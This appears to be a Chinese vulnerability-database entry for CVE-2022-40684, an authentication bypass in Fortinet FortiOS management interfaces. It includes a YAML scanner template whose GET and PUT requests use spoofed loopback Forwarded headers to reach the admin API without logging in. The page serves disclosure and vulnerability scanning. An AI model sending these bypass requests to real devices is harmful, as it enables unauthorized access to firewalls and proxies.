CVE-2022-40684: Fortinet FortiOS admin 远程命令执行漏洞

日期: 2025-09-01 | 影响软件: Fortinet FortiOS | POC: 已公开

漏洞描述

Fortinet 周一指出,上周修补的 CVE-2022-40684 身份验证绕过安全漏洞,正在野外被广泛利用。作为管理界面上的一个身份验证绕过漏洞,远程威胁参与者可利用其登录 FortiGate 防火墙、FortiProxy Web 代理、以及 FortiSwitch Manager(FSWM)本地管理实例 title="FortiProxy"

PoC代码[已公开]

id: CVE-2022-40684

info:
  name: Fortinet FortiOS admin 远程命令执行漏洞
  author: Shockwave,nagli,carlosvieira
  severity: critical
  description: |
    Fortinet 周一指出,上周修补的 CVE-2022-40684 身份验证绕过安全漏洞,正在野外被广泛利用。作为管理界面上的一个身份验证绕过漏洞,远程威胁参与者可利用其登录 FortiGate 防火墙、FortiProxy Web 代理、以及 FortiSwitch Manager(FSWM)本地管理实例
    title="FortiProxy"
  reference:
    - https://github.com/horizon3ai/CVE-2022-40684/blob/master/CVE-2022-40684.py
    - https://securityonline.info/researchers-have-developed-cve-2022-40684-poc-exploit-code/
    - https://socradar.io/what-do-you-need-to-know-about-fortinet-critical-authentication-bypass-vulnerability-cve-2022-40684/
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40684
    - http://wiki.peiqi.tech/wiki/iot/Fortinet/Fortinet%20FortiOS%20admin%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%20CVE-2022-40684.html

rules:
  r0:
    request:
      method: GET
      path: /api/v2/cmdb/system/admin
      headers:
        User-Agent: Node.js
        Forwarded: by="[127.0.0.1]:1337";for="[127.0.0.1]:1337";proto=http;host=
        X-Forwarded-Vdom: root
    expression: response.body.bcontains(b'ENC XXXX') && response.body.bcontains(b'http_method')
  r1:
    request:
      method: PUT
      path: /api/v2/cmdb/system/admin/admin
      headers:
        Content-Type: application/json
        Forwarded: for=[127.0.0.1]:8000;by=[127.0.0.1]:9000;
      body: |
        {
           "ssh-public-key1":"123"
        }
    expression: response.body.bcontains(b'Invalid SSH public key.') && response.body.bcontains(b'cli_error')
expression: r0() || r1()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/CVE/2022/CVE-2022-40684.yaml

相关漏洞推荐